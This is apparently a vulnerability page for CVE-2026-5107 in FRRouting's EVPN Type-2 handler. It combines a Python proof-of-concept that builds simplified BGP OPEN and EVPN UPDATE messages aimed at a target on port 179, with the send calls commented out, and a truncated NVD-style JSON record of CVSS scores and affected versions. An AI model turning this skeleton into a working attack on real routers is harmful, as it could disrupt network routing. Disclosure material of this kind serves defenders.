CVE-2026-5107

#!/usr/bin/env python3 # PoC for CVE-2026-5107: FRRouting EVPN Type-2 Route Improper Access Control # This script simulates sending a crafted BGP EVPN Type-2 route update. # Note: Actual exploitation requires a BGP session and specific network conditions. import socket import struct def build_bgp_open(): # Simplified BGP OPEN message return b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x1d\x01\x04\x00\x64\x00\xb4\x0c\x00\x00\x00\x00' def build_evpn_update(): # Simplified BGP UPDATE with EVPN NLRI (Type-2) # This is a conceptual representation, not a fully compliant packet. marker = b'\xff' * 16 length = struct.pack('!H', 50) # Placeholder length type_ = b'\x02' # UPDATE withdrawn_len = struct.pack('!H', 0) path_attr_len = struct.pack('!H', 0) # Simplified # EVPN Type-2 NLRI (MAC/IP Advertisement Route) # Format: [Type(1)][Length(1)][Route Distinguisher(8)][ESI(10)][ETag(4)][MAC(6)][IP(4 or 16)] nlri = b'\x02\x19' # Type 2, Length 25 (example) nlri += b'\x00' * 8 # RD (Route Distinguisher) nlri += b'\x00' * 10 # ESI (Ethernet Segment Identifier) nlri += b'\x00' * 4 # ETag nlri += b'\x00\x11\x22\x33\x44\x55' # MAC Address nlri += b'\xc0\xa8\x01\x01' # IP Address message = marker + length + type_ + withdrawn_len + path_attr_len + nlri # Update length length_corrected = struct.pack('!H', len(message)) return marker + length_corrected + type_ + withdrawn_len + path_attr_len + nlri # In a real scenario, connect to BGP port 179 # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect(('target_ip', 179)) # sock.send(build_bgp_open()) # sock.send(build_evpn_update()) print("[+] Crafted EVPN Type-2 Update generated (Conceptual PoC)") print("[+] Refer to patch 7676cad65114aa23adde583d91d9d29e2debd045 for details")

{"cve": {"id": "CVE-2026-5107", "sourceIdentifier": "[email protected]", "published": "2026-03-30T06:16:05.510", "lastModified": "2026-04-29T22:01:48.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in FRRouting FRR up to 10.5.1. This affects the function process_type2_route of the file bgpd/bgp_evpn.c of the component EVPN Type-2 Route Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The attack is considered to have high complexity. The exploitability is reported as difficult. The identifier of the patch is 7676cad65114aa23adde583d91d9d29e2debd045. To fix this issue, it is recommended to deploy a patch."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en FRRouting FRR hasta la versión 10.5.1. Esto afecta a la función process_type2_route del archivo bgpd/bgp_evpn.c del componente Gestor de Rutas EVPN Tipo-2. La manipulación conduce a controles de acceso inadecuados. El ataque puede iniciarse de forma remota. El ataque se considera de alta complejidad. La explotabilidad se reporta como difícil. El identificador del parche es 7676cad65114aa23adde583d91d9d29e2debd045. Para solucionar este problema, se recomienda aplicar un parche."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:S/C:N/I:P/A:P", "baseScore": 3.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frrouting:frrouting:10.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "602011E7-4715-4162-A3BE-7E487CBB632B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frrouting:frrouting:10.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "A6E88B9B-6953-410D-B6FB-275BD59D3715"}]}]}], "references": [{"url": "https://github.com/FRRouting/frr/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/FRRouting ... (truncated)